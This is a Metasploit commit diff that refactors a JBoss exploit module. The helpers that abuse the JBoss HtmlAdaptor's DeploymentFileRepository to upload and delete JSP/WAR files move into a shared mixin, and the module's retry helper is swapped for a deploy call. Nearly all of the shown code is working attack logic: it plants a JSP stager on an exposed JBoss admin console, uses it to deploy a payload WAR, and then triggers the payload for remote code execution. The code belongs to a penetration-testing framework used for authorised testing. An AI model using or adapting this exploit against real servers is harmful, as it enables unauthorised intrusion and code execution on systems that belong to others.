Refactoring jboss module to work with the Mixin

us3r777 · us3r777 · commit 33f90de7f622 · 2014-08-29T20:08:35.000+02:00
Moved upload and delete methods of deploymentfilerepository to the
mixin. Removed call_uri_mtimes method as the module now uses deploy
from the mixin.
diff --git a/lib/msf/http/jboss.rb b/lib/msf/http/jboss.rb
@@ -7,11 +7,13 @@ module JBoss
       require 'msf/http/jboss/base'
       require 'msf/http/jboss/bean_shell_scripts'
       require 'msf/http/jboss/bean_shell'
+      require 'msf/http/jboss/deployment_file_repository'
 
       include Msf::Exploit::Remote::HttpClient
       include Msf::HTTP::JBoss::Base
       include Msf::HTTP::JBoss::BeanShellScripts
       include Msf::HTTP::JBoss::BeanShell
+      include Msf::HTTP::JBoss::DeploymentFileRepository
 
       def initialize(info = {})     
         super
diff --git a/lib/msf/http/jboss/deployment_file_repository.rb b/lib/msf/http/jboss/deployment_file_repository.rb
@@ -0,0 +1,64 @@
+# -*- coding: binary -*-
+
+module Msf::HTTP::JBoss::DeploymentFileRepository
+
+  # Upload a text file with DeploymentFileRepository.store()
+  def upload_file(base_name, jsp_name, content)
+    params =  { }
+    params.compare_by_identity
+    params['action']     = 'invokeOpByName'
+    params['name']       = 'jboss.admin:service=DeploymentFileRepository'
+    params['methodName'] = 'store'
+    params['argType']    = 'java.lang.String'
+    params['arg0']       = base_name + '.war'
+    params['argType']    = 'java.lang.String'
+    params['arg1']       = jsp_name 
+    params['argType']    = 'java.lang.String'
+    params['arg2']       = '.jsp'
+    params['argType']    = 'java.lang.String'
+    params['arg3']       = content
+    params['argType']    = 'boolean'
+    params['arg4']       = 'True'
+
+    opts = {
+      'method'	=> http_verb,
+      'uri'    => normalize_uri(target_uri.path.to_s, '/HtmlAdaptor')
+    }
+
+    if http_verb == 'POST'
+      opts.merge!('vars_post' => params)
+    else
+      opts.merge!('vars_get' => params)
+    end
+
+    send_request_cgi(opts)
+  end
+
+  # Delete a file with DeploymentFileRepository.remove().
+  def delete_file(folder, name, ext)
+    params =  { }
+    params.compare_by_identity
+    params['action']     = 'invokeOpByName'
+    params['name']       = 'jboss.admin:service=DeploymentFileRepository'
+    params['methodName'] = 'remove'
+    params['argType']    = 'java.lang.String'
+    params['arg0']       = folder
+    params['argType']    = 'java.lang.String'
+    params['arg1']       = name
+    params['argType']    = 'java.lang.String'
+    params['arg2']       = ext
+
+    opts = {
+      'method'	=> http_verb,
+      'uri'    => normalize_uri(target_uri.path.to_s, '/HtmlAdaptor')
+    }
+
+    if http_verb == 'POST'
+      opts.merge!('vars_post' => params)
+    else
+      opts.merge!('vars_get' => params)
+    end
+    send_request_cgi(opts)
+  end
+
+end
diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -2,7 +2,6 @@
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
@@ -205,7 +204,7 @@ def exploit
         next_pos = current_pos + 5000 + rand(100)
         junk = "#{content_var}=" + Rex::Text.uri_encode(stager_jsp_code[current_pos,next_pos])
         print_status("Uploading second stager (#{current_pos}/#{stager_jsp_code.length})")
-        res = call_uri_mtimes(head_stager_uri + junk)
+        res = deploy('uri' => head_stager_uri + junk)
         current_pos += next_pos
       end
     end
@@ -217,12 +216,12 @@ def exploit
     if (res.code == 200 || res.code == 500)
       print_status("Calling stager to deploy the payload warfile (might take some time)")
       stager_uri = '/' + stager_base + '/' + stager_jsp + '.jsp'
-      stager_res = call_uri_mtimes(stager_uri)
+      stager_res = deploy('uri' => stager_uri)
 
       print_status("Try to call the deployed payload")
       # Try to execute the payload by calling the deployed WAR file
       payload_uri = "/" + app_base + "/" + jsp_name + '.jsp'
-      payload_res = call_uri_mtimes(payload_uri)
+      payload_res = deploy('uri' => payload_uri)
 
       #
       # DELETE
@@ -249,103 +248,4 @@ def exploit
   end
 
 
-  # Upload a text file with DeploymentFileRepository.store()
-  def upload_file(base_name, jsp_name, content)
-    data =  'action=invokeOpByName'
-    data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
-    data << '&methodName=store'
-    data << '&argType=java.lang.String'
-    data << '&arg0=' + Rex::Text.uri_encode(base_name) + '.war'
-    data << '&argType=java.lang.String'
-    data << '&arg1=' + jsp_name
-    data << '&argType=java.lang.String'
-    data << '&arg2=.jsp'
-    data << '&argType=java.lang.String'
-    data << '&arg3=' + Rex::Text.uri_encode(content)
-    data << '&argType=boolean'
-    data << '&arg4=True'
-
-    if (datastore['VERB'] == "POST")
-      res = send_request_cgi(
-        {
-          'uri'    => normalize_uri(datastore['TARGETURI'], '/HtmlAdaptor'),
-          'method' => datastore['VERB'],
-          'data'   => data
-        }, 5)
-    else
-      res = send_request_cgi(
-        {
-          'uri'    =>  normalize_uri(datastore['TARGETURI'], '/HtmlAdaptor') + "?#{data}",
-          'method' => datastore['VERB'],
-        }, 30)
-    end
-
-    res
-  end
-
-
-  # Delete a file with DeploymentFileRepository.remove().
-  def delete_file(folder, name, ext)
-    data =  'action=invokeOpByName'
-    data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
-    data << '&methodName=remove'
-    data << '&argType=java.lang.String'
-    data << '&arg0=' + folder
-    data << '&argType=java.lang.String'
-    data << '&arg1=' + name
-    data << '&argType=java.lang.String'
-    data << '&arg2=' + ext
-
-    if (datastore['VERB'] == "POST")
-      res = send_request_cgi(
-        {
-          'uri'    => normalize_uri(datastore['TARGETURI'], '/HtmlAdaptor'),
-          'method' => datastore['VERB'],
-          'data'   => data
-        }, 5)
-    else
-      res = send_request_cgi(
-        {
-          'uri'    => normalize_uri(datastore['TARGETURI'], '/HtmlAdaptor;index.jsp') + "?#{data}",
-          'method' => datastore['VERB'],
-        }, 30)
-    end
-    res
-  end
-
-  # Call the URL multiple times until we have hit
-  def call_uri_mtimes(uri, num_attempts = 5)
-    verb = datastore['VERB']
-    verb = 'HEAD' if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
-
-    # JBoss might need some time for the deployment. Try 5 times at most and
-    # wait 5 seconds inbetween tries
-    num_attempts.times do |attempt|
-      res = send_request_cgi({
-        'uri'    => uri,
-        'method' => verb
-      }, 30)
-
-      stripped_uri = uri[0,70] + "..."
-      msg = nil
-      if (!res)
-        msg = "Execution failed on #{stripped_uri} [No Response]"
-      elsif (res.code < 200 or res.code >= 300)
-        msg = "http request failed to #{stripped_uri} [#{res.code}]"
-      elsif (res.code == 200)
-        print_status("Successfully called '#{stripped_uri}'") if datastore['VERBOSE']
-        return res
-      end
-
-      if (attempt < num_attempts - 1)
-        msg << ", retrying in 5 seconds..."
-        print_status(msg) if datastore['VERBOSE']
-        select(nil, nil, nil, 5)
-      else
-        print_error(msg)
-        return res
-      end
-    end
-  end
-
 end
